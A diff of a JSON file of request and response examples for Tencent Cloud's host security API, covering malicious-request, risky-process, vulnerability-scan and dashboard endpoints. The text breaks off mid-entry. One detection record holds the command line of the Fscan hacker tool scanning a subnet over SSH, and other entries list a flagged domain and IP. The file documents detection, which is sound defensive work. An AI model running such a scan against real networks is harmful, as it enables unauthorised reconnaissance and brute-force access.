\"CmdLine\": \"ping 100.60.00.200 \",\n \"FirstTime\": \"2022-09-19 14:57:23\",\n \"LastTime\": \"2022-09-19 14:57:23\"\n }\n ],\n \"RequestId\": \"130e109f-a922-4d16-827d-b17a366125a2\",\n \"TotalCount\": 9989\n }\n}",
|
2258
2230
|
"title": "获取恶意请求事件列表"
|
2259
2231
|
}
|
2260
2232
|
],
|
@@ -2262,7 +2234,7 @@
|
|
2262
2234
|
{
|
2263
2235
|
"document": "查询恶意请求详情",
|
2264
2236
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRiskDnsInfo\n<公共请求参数>\n\n{\n \"Id\": 1\n}",
|
2265
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"5d14133e-4727-4937-b076-6ff1b9a59f14\",\n \"RiskDnsInfo\": {\n \"Url\": \"www.
|
2237
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"5d14133e-4727-4937-b076-6ff1b9a59f14\",\n \"RiskDnsInfo\": {\n \"Url\": \"www.test.com\",\n \"AccessCount\": 7,\n \"ProcessName\": \"/bin/a***\",\n \"ProcessMd5\": \"472c65af3f43136472d1a383f5******\",\n \"GlobalRuleId\": 0,\n \"UserRuleId\": 0,\n \"Status\": 0,\n \"CreateTime\": \"2024-10-24 09:10:13\",\n \"MergeTime\": \"2024-10-24 09:10:27\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"Alias\": \"别名\",\n \"Description\": \"未知的APT组织\",\n \"Id\": 10001,\n \"Pid\": 0,\n \"CmdLine\": \"cmd\",\n \"Reference\": \"ref\",\n \"SuggestScheme\": \"1、检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2、隔离或者删除相关的木马文件;\\n3、对系统进行风险排查,并进行安全加固,详情可参考如下链接: \\n【Linux】https://cloud.tencent.com/document/product/296/9604 \\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"Tags\": [\n \"apt\",\n \"apt\"\n ],\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineStatus\": \"ONLINE\"\n }\n }\n}",
|
2266
2238
|
"title": "示例"
|
2267
2239
|
}
|
2268
2240
|
],
|
@@ -2270,7 +2242,7 @@
|
|
2270
2242
|
{
|
2271
2243
|
"document": "入侵检测-获取恶意请求列表",
|
2272
2244
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeRiskDnsList\n&Limit=10\n&Offset=0\n&<公共请求参数>",
|
2273
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"RiskDnsList\": [\n {\n \"Url\": \"odysseusweb.ru\",\n \"AccessCount\": 6,\n \"ProcessName\": \"C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"ProcessMd5\": \"97cdf8b51cea8d0f296e6871e388979d\",\n \"GlobalRuleId\": 0,\n \"UserRuleId\": 0,\n \"Status\": 0,\n \"CreateTime\": \"2019-12-25 22:31:54\",\n \"MergeTime\": \"2019-12-25 22:31:54\",\n \"Quuid\": \"e761c2dc-bc72-40cd-b9ed-d233c86b1a8b\",\n \"HostIp\": \"2402:4e00:1010:5401:0:8f51:5190:3bfa\",\n \"Alias\": \"ipv6_windows_test\",\n \"Description\": \"\",\n \"Uuid\": \"e761c2dc-bc72-40cd-b9ed-d233c86b1a8\",\n \"Pid\": 1,\n \"Id\": 1,\n \"CmdLine\": \"
|
2245
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"RiskDnsList\": [\n {\n \"Url\": \"odysseusweb.ru\",\n \"AccessCount\": 6,\n \"ProcessName\": \"C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"ProcessMd5\": \"97cdf8b51cea8d0f296e6871e388979d\",\n \"GlobalRuleId\": 0,\n \"UserRuleId\": 0,\n \"Status\": 0,\n \"CreateTime\": \"2019-12-25 22:31:54\",\n \"MergeTime\": \"2019-12-25 22:31:54\",\n \"Quuid\": \"e761c2dc-bc72-40cd-b9ed-d233c86b1a8b\",\n \"HostIp\": \"2402:4e00:1010:5401:0:8f51:5190:3bfa\",\n \"Alias\": \"ipv6_windows_test\",\n \"Description\": \"desc\",\n \"Uuid\": \"e761c2dc-bc72-40cd-b9ed-d233c86b1a8\",\n \"Pid\": 1,\n \"Id\": 1,\n \"Tags\": [\n \"vueir\",\n \"mle\"\n ],\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineStatus\": \"OFFLINE\",\n \"SuggestScheme\": \"reboot\",\n \"CmdLine\": \"ps -ef\",\n \"Reference\": \"/tmp/acsess\"\n }\n ],\n \"TotalCount\": 20\n }\n}",
|
2274
2246
|
"title": "获取恶意请求列表"
|
2275
2247
|
}
|
2276
2248
|
],
|
@@ -2278,7 +2250,7 @@
|
|
2278
2250
|
{
|
2279
2251
|
"document": "",
|
2280
2252
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRiskDnsPolicyList\n<公共请求参数>\n\n{\n \"Limit\": 10\n}",
|
2281
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"PolicyId\": 1001,\n \"PolicyName\": \"系统规则(重保)\",\n \"PolicyType\": 0,\n \"PolicyDesc\": \"系统规则(重保)\",\n \"PolicyAction\": 0,\n \"HostScope\": 1,\n \"HostIds\": [],\n \"Domains\": [\n \"\"\n ],\n \"IsEnabled\": 1,\n \"IsDealOldEvent\": 0,\n \"EventId\": 0,\n \"UpdateTime\": \"2022-09-19 17:12:01\"\n }\n ],\n \"RequestId\": \"a8a04837-4318-4a21-8a05-7096ed84062c\",\n \"TotalCount\": 21\n }\n}",
|
2253
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"PolicyId\": 1001,\n \"PolicyName\": \"系统规则(重保)\",\n \"PolicyType\": 0,\n \"PolicyDesc\": \"系统规则(重保)\",\n \"PolicyAction\": 0,\n \"HostScope\": 1,\n \"HostIds\": [],\n \"Domains\": [\n \"domainsName\"\n ],\n \"IsEnabled\": 1,\n \"IsDealOldEvent\": 0,\n \"EventId\": 0,\n \"UpdateTime\": \"2022-09-19 17:12:01\"\n }\n ],\n \"RequestId\": \"a8a04837-4318-4a21-8a05-7096ed84062c\",\n \"TotalCount\": 21\n }\n}",
|
2282
2254
|
"title": "获取恶意请求策略列表"
|
2283
2255
|
}
|
2284
2256
|
],
|
@@ -2286,14 +2258,14 @@
|
|
2286
2258
|
{
|
2287
2259
|
"document": "",
|
2288
2260
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRiskProcessEvents\n<公共请求参数>\n\n{\n \"Limit\": 30\n}",
|
2289
|
-
"output": "{\n \"Response\": {\n \"List\": [],\n \"RequestId\": \"e8fc6e04-5b3d-405d-ab61-da7cc8be2583\",\n \"TotalCount\": 89\n }\n}",
|
2261
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"EventId\": 24,\n \"HostName\": \"Public-Main-行致-IT-埃安流量管理与服务平台-后台-MNO业务工程-CVM2\",\n \"Uuid\": \"364e2cb6-e3a3-****-9abd-b87711b880e3\",\n \"HostIp\": \"10.***.***.248\",\n \"WanIp\": \"127.5.**.**\",\n \"ProcessId\": 21595,\n \"FilePath\": \"/dev/shm/dev\",\n \"CmdLine\": \"./dev -h 10.***.**.1/24 -m ssh -nopoc -t 200 -o ssh.txt \",\n \"StartTime\": \"2023-09-16 18:28:00\",\n \"DetectTime\": \"2023-09-16 18:30:55\",\n \"VirusName\": \"Linux.Scanner.Fscan\",\n \"CheckPlatform\": [\n \"1\"\n ],\n \"VirusTags\": [\n \"scanner\",\n \"hack_tools\"\n ],\n \"ThreatDesc\": \"发现主机上存在黑客工具进程,若不是您的主动行为,您的主机可能已经失陷。 黑客工具通常包含扫描器、爆破工具、密码窃取器等恶意软件程序,会被攻击者用来发起攻击。\",\n \"SuggestSolution\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接: \\n【Linux】https://**.*.com/document/product/296/9604 \\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"ReferenceLink\": \"https://cloud.tencent.com/document/product/296/9605\",\n \"HandleStatus\": 3,\n \"OnlineStatus\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"10.*.*.*\",\n \"PrivateIP\": \"10.*.*.*\",\n \"NetworkType\": 0,\n \"NetworkName\": \"eth1\",\n \"InstanceID\": \"ins-jvi1gdu0\",\n \"HostName\": \"dataHub\"\n }\n }\n ],\n \"RequestId\": \"e8fc6e04-5b3d-405d-ab61-da7cc8be2583\",\n \"TotalCount\": 89\n }\n}",
|
2290
2262
|
"title": "获取异常进程列表"
|
2291
2263
|
}
|
2292
2264
|
],
|
2293
2265
|
"DescribeSafeInfo": [
|
2294
2266
|
{
|
2295
2267
|
"document": "",
|
2296
|
-
"input": "
|
2268
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeSafeInfo\n<公共请求参数>\n\n{}",
|
2297
2269
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
2298
2270
|
"title": "查询安全通知"
|
2299
2271
|
}
|
@@ -2318,7 +2290,7 @@
|
|
2318
2290
|
{
|
2319
2291
|
"document": "",
|
2320
2292
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeScanState\n<公共请求参数>\n\n{\n \"ModuleType\": \"Vul\"\n}",
|
2321
|
-
"output": "{\n \"Response\": {\n \"RiskEventCount\": 1,\n \"ScanEndTime\": \"
|
2293
|
+
"output": "{\n \"Response\": {\n \"RiskEventCount\": 1,\n \"ScanEndTime\": \"2023-10-26 14:56:29\",\n \"Schedule\": 1,\n \"ScanState\": 1,\n \"ScanBeginTime\": \"2023-10-26 14:56:29\",\n \"RequestId\": \"c741a4fd-776f-499b-85a2-7bc70fd5b92s\",\n \"TaskId\": 1,\n \"VulId\": [\n 1\n ],\n \"Type\": 1\n }\n}",
|
2322
2294
|
"title": "示例"
|
2323
2295
|
}
|
2324
2296
|
],
|
@@ -2326,7 +2298,7 @@
|
|
2326
2298
|
{
|
2327
2299
|
"document": "",
|
2328
2300
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeScanTaskDetails\n<公共请求参数>\n\n{\n \"ModuleType\": \"Vul\",\n \"TaskId\": 1\n}",
|
2329
|
-
"output": "{\n \"Response\": {\n \"ScanContent\": [\n \"cve\"\n ],\n \"VulInfo\": [\n {\n \"CveId\": \"cve-
|
2301
|
+
"output": "{\n \"Response\": {\n \"ScanContent\": [\n \"cve\"\n ],\n \"VulInfo\": [\n {\n \"CveId\": \"cve- \",\n \"CvssScore\": 0,\n \"Name\": \"name\",\n \"Reference\": \"ref\",\n \"Level\": 1,\n \"Fix\": \"fix\",\n \"Descript\": \"desc\",\n \"PublishTime\": \" 2019-12-25 11:57:15\",\n \"VulId\": 1,\n \"Cvss\": \"cvss\",\n \"VulCategory\": 1\n }\n ],\n \"ScanMachineCount\": 1,\n \"ScanTaskDetailList\": [\n {\n \"Status\": \"status\",\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"ScanEndTime\": \" 2019-12-25 11:57:15\",\n \"FailType\": 1,\n \"HostName\": \"hostname\",\n \"ScanBeginTime\": \" 2019-12-25 11:57:15\",\n \"OsName\": \"osname\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"HostIp\": \"10.1.1.15\",\n \"RiskNum\": 1,\n \"Id\": 1,\n \"Description\": \"desc\",\n \"MachineWanIp\": \"10.1.1.15\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"10.1.1.15\",\n \"PrivateIP\": \"10.1.1.15\",\n \"NetworkType\": 0,\n \"NetworkName\": \"name\",\n \"InstanceID\": \"ins-dsf\",\n \"HostName\": \"hostname\"\n }\n }\n ],\n \"ScanEndTime\": \" 2019-12-25 11:57:15\",\n \"ScanTime\": 1,\n \"ScanProgress\": 1,\n \"ScanLeftTime\": 1,\n \"ScanBeginTime\": \" 2019-12-25 11:57:15\",\n \"TotalCount\": 1,\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"RiskEventCount\": 1,\n \"VulCount\": 1,\n \"RiskMachineCount\": 1,\n \"Type\": 1,\n \"StoppingAll\": false\n }\n}",
|
2330
2302
|
"title": "示例"
|
2331
2303
|
}
|
2332
2304
|
],
|
@@ -2334,7 +2306,7 @@
|
|
2334
2306
|
{
|
2335
2307
|
"document": "",
|
2336
2308
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeScanTaskStatus\n<公共请求参数>\n\n{\n \"ModuleType\": \"Malware\"\n}",
|
2337
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"f1dd9f5e-4ac0-48a7-9410-c86d24656d9a\",\n \"State\": {\n \"Scanning\": \"
|
2309
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"f1dd9f5e-4ac0-48a7-9410-c86d24656d9a\",\n \"State\": {\n \"Scanning\": \"扫描中\",\n \"Ok\": \"扫描成功\",\n \"Stop\": \"扫描中止\",\n \"Fail\": \"扫描失败\"\n }\n }\n}",
|
2338
2310
|
"title": "示例"
|
2339
2311
|
}
|
2340
2312
|
],
|
@@ -2350,7 +2322,7 @@
|
|
2350
2322
|
{
|
2351
2323
|
"document": "大屏获取安全事件数统计数据",
|
2352
2324
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeScreenAttackHotspot\n<公共请求参数>\n\n{}",
|
2353
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"CreatedTime\": \"2022-06-28 19:27:26\",\n \"DstIp\": \"
|
2325
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"CreatedTime\": \"2022-06-28 19:27:26\",\n \"DstIp\": \"10.0.0.1\",\n \"EventName\": \"Atlassian Crowd和Atlassian Crowd Data Center 输入验证错误漏洞(CVE-2019-11580)\",\n \"Region\": \"ap-guangzhou\",\n \"SrcIp\": \"10.0.0.1\"\n }\n ],\n \"RequestId\": \"3dcfeooo-c2fa-4e5c-a1f7-9f28ce88f554\"\n }\n}",
|
2354
2326
|
"title": "大屏获取安全事件数统计数据"
|
2355
2327
|
}
|
2356
2328
|
],
|
@@ -2397,8 +2369,8 @@
|
|
2397
2369
|
"DescribeScreenHostInvasion": [
|
2398
2370
|
{
|
2399
2371
|
"document": "",
|
2400
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeScreenHostInvasion\n&Quuid=\"
|
2401
|
-
"output": "{\n \"Response\": {\n \"DefendAttackLog\": [\n {\n \"DstIp\": \"
|
2372
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeScreenHostInvasion\n&Quuid=\"1c26308c-5493-4eaf-a817-112ec25f499e\"\n&<公共请求参数>",
|
2373
|
+
"output": "{\n \"Response\": {\n \"DefendAttackLog\": [\n {\n \"DstIp\": \"10.1.1.15\",\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"VulType\": \"web\",\n \"SrcPort\": 1,\n \"HttpMethod\": \"POST\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"CreatedTime\": \" 2019-12-25 11:57:15\",\n \"DstPort\": 1,\n \"Id\": 1,\n \"SrcIp\": \"10.1.1.14\"\n }\n ],\n \"Vul\": [\n {\n \"Category\": 1,\n \"Name\": \"name\",\n \"Level\": 1,\n \"VulId\": 1,\n \"LastTime\": \" 2019-12-25 11:57:15\",\n \"Id\": 1,\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\"\n }\n ],\n \"InvasionEvents\": [\n {\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Level\": 1,\n \"EventType\": 1,\n \"Content\": \"content\",\n \"CreatedTime\": \" 2019-12-25 11:57:15\",\n \"LevelZh\": \"level\",\n \"Id\": 1\n }\n ],\n \"Baseline\": [\n {\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Level\": 1,\n \"LastScanTime\": \" 2019-12-25 11:57:15\",\n \"BaselineFailCount\": 1,\n \"CategoryId\": 1,\n \"Name\": \"name\"\n }\n ],\n \"RequestId\": \"1c26308c-1af3-4eaf-a817-112ec25f4dfa\"\n }\n}",
|
2402
2374
|
"title": "示例"
|
2403
2375
|
}
|
2404
2376
|
],
|
@@ -2414,7 +2386,7 @@
|
|
2414
2386
|
{
|
2415
2387
|
"document": "主机3D图数据\n",
|
2416
2388
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeScreenMachines\n<公共请求参数>\n\n{}",
|
2417
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"AttackCnt\": 0,\n \"IgnoreCnt\": 0,\n \"Machines\": [\n {\n \"BaselineNum\": 147,\n \"CoreVersion\": \"3.10.0\",\n \"CpuLoad\": \"低\",\n \"CpuSize\": 2,\n \"CyberAttackNum\": 162,\n \"DiskLoad\": \"32.07\",\n \"DiskSize\": 50,\n \"InvasionNum\": 38479,\n \"MachineExtraInfo\": {\n \"HostName\": \"\",\n \"InstanceID\": \"ins-
|
2389
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"AttackCnt\": 0,\n \"IgnoreCnt\": 0,\n \"Machines\": [\n {\n \"BaselineNum\": 147,\n \"CoreVersion\": \"3.10.0\",\n \"CpuLoad\": \"低\",\n \"CpuSize\": 2,\n \"CyberAttackNum\": 162,\n \"DiskLoad\": \"32.07\",\n \"DiskSize\": 50,\n \"InvasionNum\": 38479,\n \"MachineExtraInfo\": {\n \"HostName\": \"hn\",\n \"InstanceID\": \"ins-id\",\n \"NetworkName\": \"vpc-id\",\n \"NetworkType\": 0,\n \"PrivateIP\": \"1.1.1.1\",\n \"WanIP\": \"1.1.1.1\"\n },\n \"MachineIp\": \"1.2.3.*\",\n \"MachineName\": \"ha2\",\n \"MachineOs\": \"CentOS 7.9 64位\",\n \"MachineStatus\": 9,\n \"MachineType\": \"CVM\",\n \"MachineWanIp\": \"1.2.3.*\",\n \"MemLoad\": \"36.52\",\n \"MemSize\": 4,\n \"Quuid\": \"1c26308c-5493-4eaf-***-112ec25f499e\",\n \"SecurityStatus\": \"RISK\",\n \"Uuid\": \"1c26308c-5493-4eaf-****-112ec25f499e\",\n \"VulNum\": 18\n }\n ],\n \"Region\": \"ap-guangzhou\",\n \"RegionName\": \"华南地区(广州)\",\n \"RiskCnt\": 1,\n \"SafetyCnt\": 1,\n \"TotalCount\": 1,\n \"UnAgentOfflineCnt\": 1\n }\n ],\n \"RequestId\": \"1c26308c-1234-5678-9101-112ec25f499e\"\n }\n}",
|
2418
2390
|
"title": "示例"
|
2419
2391
|
}
|
2420
2392
|
],
|
@@ -2438,7 +2410,7 @@
|
|
2438
2410
|
{
|
2439
2411
|
"document": "大屏获取安全事件数统计数据\n",
|
2440
2412
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeScreenRiskAssetsTop\n<公共请求参数>\n\n{\n \"BusinessType\": 2\n}",
|
2441
|
-
"output": "{\n \"Response\": {\n \"Chart\": [\n {\n \"Name\": \"
|
2413
|
+
"output": "{\n \"Response\": {\n \"Chart\": [\n {\n \"Name\": \"1.1.1.1广州\",\n \"Value\": 21\n }\n ],\n \"RequestId\": \"f1d8e260-c75c-454d-bc84-34ce0ed8d9bf\"\n }\n}",
|
2442
2414
|
"title": "大屏获取安全事件数统计数据"
|
2443
2415
|
}
|
2444
2416
|
],
|
@@ -2454,15 +2426,15 @@
|
|
2454
2426
|
{
|
2455
2427
|
"document": "",
|
2456
2428
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeSearchTemplates\n&Offset=0\n&Limit=10\n&<公共请求参数>",
|
2457
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 2,\n \"List\": [\n {\n \"Id\": 17,\n \"Name\": \"
|
2429
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 2,\n \"List\": [\n {\n \"Id\": 17,\n \"Name\": \"ashkd\",\n \"LogType\": \"malware\",\n \"Condition\": \"src_ip 匹配字符: 193.27.228.98\",\n \"TimeRange\": \"2020-07-31 00:00:00 至 2020-07-31 23:59:59\",\n \"Query\": \"{\\\"index\\\":[\\\"malware\\\"],\\\"body\\\":{\\\"query\\\":{\\\"bool\\\":{\\\"filter\\\":{\\\"bool\\\":{\\\"filter\\\":{\\\"range\\\":{\\\"timestamp\\\":{\\\"gte\\\":1596124800000,\\\"lte\\\":1596211199999}}},\\\"must\\\":[{\\\"term\\\":{\\\"src_ip\\\":\\\"193.27.228.98\\\"}}],\\\"must_not\\\":[],\\\"should\\\":[]}}}},\\\"aggs\\\":{\\\"count_stats\\\":{\\\"date_histogram\\\":{\\\"field\\\":\\\"timestamp\\\",\\\"interval\\\":\\\"30m\\\",\\\"time_zone\\\":\\\"Asia/Shanghai\\\",\\\"min_doc_count\\\":1}}},\\\"highlight\\\":{\\\"fields\\\":{\\\"*\\\":{}}}},\\\"sort\\\":[{\\\"timestamp\\\":\\\"desc\\\"}]}\",\n \"Flag\": \"simple\",\n \"DisplayData\": \"[{\\\"id\\\":14401398135,\\\"patternsField\\\":\\\"src_ip\\\",\\\"selectedtype\\\":\\\"is\\\",\\\"selectedOptionsMap\\\":{\\\"is\\\":\\\"匹配字符\\\",\\\"like\\\":\\\"模糊匹配字符\\\",\\\"not\\\":\\\"不包含字符\\\",\\\"is_one_of\\\":\\\"匹配以下任意字符\\\",\\\"not_one_of\\\":\\\"不包含以下任意字符\\\"},\\\"selectedTypeList\\\":[\\\"is\\\",\\\"like\\\",\\\"not\\\",\\\"is_one_of\\\",\\\"not_one_of\\\"],\\\"third_cat\\\":\\\"input\\\",\\\"value\\\":\\\"193.27.228.98\\\"}]\"\n },\n {\n \"Id\": 13,\n \"Name\": \"ndkshjs\",\n \"LogType\": \"malware\",\n \"Condition\": \"src_ip 匹配字符: 10.0.0.1\",\n \"TimeRange\": \"2020-06-13 00:00:00 至 2020-07-13 23:59:59\",\n \"Query\": \"{\\\"index\\\":[\\\"malware\\\"],\\\"body\\\":{\\\"query\\\":{\\\"bool\\\":{\\\"filter\\\":{\\\"bool\\\":{\\\"filter\\\":{\\\"range\\\":{\\\"timestamp\\\":{\\\"gte\\\":1591977600000,\\\"lte\\\":1594655999999}}},\\\"must\\\":[{\\\"term\\\":{\\\"src_ip\\\":\\\"10.0.0.1\\\"}}],\\\"must_not\\\":[],\\\"should\\\":[]}}}},\\\"aggs\\\":{\\\"count_stats\\\":{\\\"date_histogram\\\":{\\\"field\\\":\\\"timestamp\\\",\\\"interval\\\":\\\"12h\\\",\\\"time_zone\\\":\\\"Asia/Shanghai\\\",\\\"min_doc_count\\\":1}}},\\\"highlight\\\":{\\\"fields\\\":{\\\"*\\\":{}}}},\\\"sort\\\":[{\\\"timestamp\\\":\\\"desc\\\"}]}\",\n \"Flag\": \"simple\",\n \"DisplayData\": \"[{\\\"id\\\":449375484687,\\\"patternsField\\\":\\\"src_ip\\\",\\\"selectedtype\\\":\\\"is\\\",\\\"selectedOptionsMap\\\":{\\\"is\\\":\\\"匹配字符\\\",\\\"like\\\":\\\"模糊匹配字符\\\",\\\"not\\\":\\\"不包含字符\\\",\\\"is_one_of\\\":\\\"匹配以下任意字符\\\",\\\"not_one_of\\\":\\\"不包含以下任意字符\\\"},\\\"selectedTypeList\\\":[\\\"is\\\",\\\"like\\\",\\\"not\\\",\\\"is_one_of\\\",\\\"not_one_of\\\"],\\\"third_cat\\\":\\\"input\\\",\\\"value\\\":\\\"10.0.0.1\\\"}]\"\n }\n ],\n \"RequestId\": \"252ab6a8-3d45-414d-a31e-fb668e99864c\"\n }\n}",
|
2458
2430
|
"title": "获取快速检索列表"
|
2459
2431
|
}
|
2460
2432
|
],
|
2461
2433
|
"DescribeSecurityBroadcastInfo": [
|
2462
2434
|
{
|
2463
2435
|
"document": "根据id查询安全播报文章信息",
|
2464
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeSecurityBroadcastInfo\n&Id=5\n
|
2465
|
-
"output": "{\n \"Response\": {\n \"BroadcastInfo\": {\n \"Subtitle\": \"安全播报\",\n \"Title\": \"安全播报\",\n \"CreateTime\": \"2019-12-25 11:57:15\",\n \"Content\": \"安全播报\",\n \"Id\": 5\n },\n \"RequestId\": \"5b49dea4-0d0e-400f-8d11-2fdf1707c51a\"\n }\n}",
|
2436
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeSecurityBroadcastInfo\n&Id=5\n&<公共请求参数>\n",
|
2437
|
+
"output": "{\n \"Response\": {\n \"BroadcastInfo\": {\n \"Subtitle\": \"安全播报\",\n \"Title\": \"安全播报\",\n \"CreateTime\": \"2019-12-25 11:57:15\",\n \"Content\": \"安全播报\",\n \"Id\": 5,\n \"Type\": 0,\n \"GotoType\": 0\n },\n \"RequestId\": \"5b49dea4-0d0e-400f-8d11-2fdf1707c51a\"\n }\n}",
|
2466
2438
|
"title": "查询安全播报文章信息"
|
2467
2439
|
}
|
2468
2440
|
],
|
@@ -2510,7 +2482,7 @@
|
|
2510
2482
|
{
|
2511
2483
|
"document": "获取安全事件统计数据。",
|
2512
2484
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeSecurityTrends\n<公共请求参数>\n\n{\n \"BeginDate\": \"2020-06-20\",\n \"EndDate\": \"2020-06-22\"\n}",
|
2513
|
-
"output": "{\n \"Response\": {\n \"ReverseShells\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"NonLocalLoginPlaces\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"MaliciousRequests\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"Vuls\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"PrivilegeEscalations\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"Malwares\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"RequestId\": \"
|
2485
|
+
"output": "{\n \"Response\": {\n \"ReverseShells\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"NonLocalLoginPlaces\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"MaliciousRequests\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"Vuls\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"PrivilegeEscalations\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"Malwares\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"RequestId\": \"e5b4724c-49af-46ab-bd84-cdbae897e7e0\",\n \"BruteAttacks\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"BaseLines\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"CyberAttacks\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ],\n \"HighRiskBashs\": [\n {\n \"Date\": \"2020-09-22\",\n \"EventNum\": 1\n }\n ]\n }\n}",
|
2514
2486
|
"title": "获取安全事件统计数据"
|
2515
2487
|
}
|
2516
2488
|
],
|
@@ -2533,7 +2505,7 @@
|
|
2533
2505
|
"DescribeStrategyExist": [
|
2534
2506
|
{
|
2535
2507
|
"document": "根据策略名查询策略是否已存在",
|
2536
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeStrategyExist\n&StrategyName=\"策略1\"\n
|
2508
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeStrategyExist\n&StrategyName=\"策略1\"\n&<公共请求参数>\n\n {}",
|
2537
2509
|
"output": "{\n \"Response\": {\n \"RequestId\": \"req-566234234\",\n \"IfExist\": 1\n }\n}",
|
2538
2510
|
"title": "策略名查询策略"
|
2539
2511
|
}
|
@@ -2542,7 +2514,7 @@
|
|
2542
2514
|
{
|
2543
2515
|
"document": "获取指定标签关联的服务器信息",
|
2544
2516
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeTagMachines\n&Id=1\n&<公共请求参数>",
|
2545
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"List\": [\n {\n \"Id\": \"
|
2517
|
+
